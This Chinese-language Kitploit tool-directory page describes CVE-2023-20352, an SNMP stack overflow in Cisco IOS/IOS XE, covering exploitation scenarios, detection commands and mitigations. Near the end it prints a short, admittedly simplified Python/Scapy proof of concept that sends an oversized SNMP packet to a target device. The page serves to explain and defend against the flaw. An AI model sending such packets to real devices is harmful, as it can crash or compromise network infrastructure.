Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices — CVE-2023-20352 是 Cisco IOS/IOS XE 的 SNMP 引擎中的一个严重栈溢出漏洞。远程攻击者只需发送精心构造的 SNMP 数据包,即可使系统崩溃或获取根控制权。所有 SNMP 版本均受影响,请立即修补,否则面临完全沦陷的风险。 | Kitploit
工具/GitHubGitHub/mrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices
漏洞利用框架漏洞分析漏洞利用网络安全渗透测试学习与教育
GitHubmrk336/snmpocalypse-cisco-bug-lets-hackers-crash-or-command-devices

SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices

CVE-2023-20352 是 Cisco IOS/IOS XE 的 SNMP 引擎中的一个严重栈溢出漏洞。远程攻击者只需发送精心构造的 SNMP 数据包,即可使系统崩溃或获取根控制权。所有 SNMP 版本均受影响,请立即修补,否则面临完全沦陷的风险。

查看仓库
411个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SNMPocalypse-Cisco-Bug-Lets-Hackers-Crash-or-Command-Devices

CVE-2023-20352 是 Cisco IOS/IOS XE 的 SNMP 引擎中的一个严重堆栈溢出漏洞。远程攻击者只需发送精心构造的 SNMP 数据包,就能使系统崩溃或夺取根控制权。所有 SNMP 版本均受影响,请立即修补,否则面临完全被控风险。

作者:Mark Malllia

SNMP 简介

简单网络管理协议 (SNMP) 是网络管理中的基础协议,使系统管理员能够监控、配置和管理网络设备。它使用端口 161(用于 SNMP 请求)和 162(用于陷阱)。SNMP 支持三个版本:v1、v2c 和 v3,每个版本提供不同级别的安全性。这让我深有感触——我的毕业论文就是关于 SNMP 的,而 Cisco 一直是我日常工作中的常客。

SNMP 的实用性涵盖实时监控、资产管理和跨网络故障检测。尽管重要,但 SNMP 在网络管理中的作用也带来了安全风险,若未妥善保护,就会像 CVE-2023-20352 漏洞那样引发问题。

问题所在:CVE-2023-20352 详解

CVE-2023-20352 是一个影响 Cisco IOS 和 IOS XE 设备的高危基于栈的缓冲区溢出漏洞。它存在于处理网络管理流量的 SNMP 子系统中。

技术细节:

  • 漏洞类型: 基于栈的缓冲区溢出 (CWE-121)
  • CVSS 评分: 7.7(高危)
  • 影响: 可能导致拒绝服务 (DoS) 或远程代码执行 (RCE)

该漏洞通过向受影响设备发送精心构造的 SNMP 数据包触发,导致边界检查不当进而发生栈溢出。所有 SNMP 版本均受影响。

利用场景

  1. 低权限攻击:

    • 所需访问权限: SNMPv2c 只读字符串或 SNMPv3 凭据。
    • 影响: 设备重启 (DoS)。
  2. 高权限攻击:

    • 所需访问权限: 具有权限 15 凭据的 SNMPv1/v2c 字符串。
    • 影响: 完全以 root 身份执行任意代码 (RCE)。

检测与验证

管理员可使用以下 CLI 命令检测漏洞:

root@kitploit:~
show running-config | include snmp-server community
show running-config | include snmp-server group
show snmp

锁定措施:缓解方案

  • 应用补丁: Cisco 已为受影响平台发布固件补丁。
  • 限制 SNMP 访问: 如果尚未设置,请将访问限制在受信任的 IP 范围内。
  • 禁用易受攻击的 OID: 使用类似 snmp-server view <view-name> <OID> excluded 的命令。

攻击者如何利用

使用 Python 和 Scapy 的概念性 PoC 展示了可利用性:

root@kitploit:~
from scapy.all import *

# 替换为目标 IP 和 SNMP 团体字符串
target_ip = "192.168.1.1"
community = "public"

# 构造恶意数据包
payload = b"A" * 1024  # 溢出缓冲区
packet = IP(dst=target_ip)/UDP(dport=161)/SNMP(community=community, PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)]))

send(packet)

注意: 这是一个简化示例。实际利用需要精确的载荷构造和权限提升。

结论

CVE-2023-20352 漏洞凸显了 SNMP 的关键作用及相关风险。组织必须优先进行补丁修复并确保 SNMP 配置安全,以减轻威胁,确保网络在面对新兴攻击时的弹性。

下载工具